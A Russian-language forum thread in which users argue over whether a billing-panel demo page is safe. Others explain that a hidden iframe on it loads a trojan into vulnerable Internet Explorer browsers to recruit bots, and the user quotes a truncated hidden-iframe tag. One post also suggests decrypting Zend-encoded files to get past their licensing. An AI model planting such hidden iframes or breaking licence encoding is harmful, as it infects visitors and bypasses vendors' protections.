Откуда такая уверенность? Просто - собирала ботов. Возможно для доса, может еще для чего. Скинь в ПМ. Просто с Гаврилой я по ПМ много общался и всякую хреновину он гнать уж точно не будет.
блин ну не прально выразилась значит. там файл ....там есть ссылка на скачивание архива этой билинг панели(демо-версии)
censored! Там такое пм-ище......токо не пугайся!Я там все выписала...чтоб было тебе понятнее! И прочти все!!
А что это такое? Frame - это вроде как рамка на английском...а как ты вообще можешь по ссылке определить что она ведет на загрузку трояна? А откуда это все у тебя? Тебе нужны программеры?
ифрейм открывает удаленную страницу с которой пытается загрузить тебе троян и запустить его. Если ты шаришся в инете с дырявым ослом, тогда есть шансы что тебе этот троян закинут и хз что потом с тобой будет. Лучше не будет точно. Вот и все.
Нужен был програмер который бы создал билинг-панель для ZeosHost-а. Я дала пример этой панеле по ссылке ******. там на странице была демо версия админки и для пользователей,которую можно было собствено и глянуть!На сайте ****.pp в ифрейме висит загрузка.....там тот архив закодирован в зенде и работает только на одном хостинге.там есть ссылка на скачивание архива этой панели, (но на другом сервере её не установишь, так как файлы закодированы зендом.) Гаврила говорил что не стоит заходить и т.д и т.п.... Но там ничего...никаких троянов....ботов...и прочего не было!!! Я смотрела и код самой страницы и за ифрейм смотрела.все было нормал. вот и архив этой панели, в нём есть файл типа header.inc.php, как я понимаю в нём прописывается сервер. http://******xpanel.rar Короче хелп ми.....крыша скоро окончательно уедет!!я разбиралась...и смотрела уже по 100 раз...ну не понимаю....ну нету там ниче
......все....крыша уехала и мозги тоже!!АААА!!! щас от переизбытка инфы и замешательств взрыв будет!!!!
А конкретно мне не понятно....про трояна...боты про которые Гаврил говорил! Лично для меня ничего не свидетельствует о том что _ссылка небезопасная_ "что она возможно уже чей-то бот =) Ну и ты тоже, если ходил по той ссылке и ничего подозрительного не заметил."(с)Гаврила
как раз в том что сказал blaga я все понял. Осел - это браузер IE. А вот читая твой пост у меня реально крыша едет так как я в таких сложных вещах не разбираюсь.. ??? ???????????????? А тут у меня уже из глаз звездочки посыпались от обилия информации.
Через эту ссылку грузят троянов. Если ты подцепила этого трояна то ты можеш стать чьим нибудь ботом. Например для ддоса. Еще раз через эту ссылку грузят троянов. Ясно? Как они это работает это уже другой вопрос.
2Дрэгги, закодированы зендом - значит что скрипт не запустится абы где. Только на одном серваке. А ей нужно что бы он запускался везде. Для этого нужно зенд расшифровать. Чего вы все непонятливые такие.
а что значит файлы и архив закодированы зендом??? Да и слова Zeoshost и билинг-панель для меня мало что говорят... А антивирь типа нод32 от этого не помогает разве?
blaga Через какую именно ссылку грузят трояна?? Ну не может этого быть!!!Ведь там ссылка была для загрузки демо-версии самой панели!!!А не трояна! Или я туплю...или незнаю....=\
blaga Ну так!!Не было ведь этой ссылки!!Этого ифрейма!! ___*разум начал прояснятся*___ Было вот: <IFRAME src="ht........и т.д и т.п(куча знаков)))" width=5 height=5 style="display:none"></IFRAME>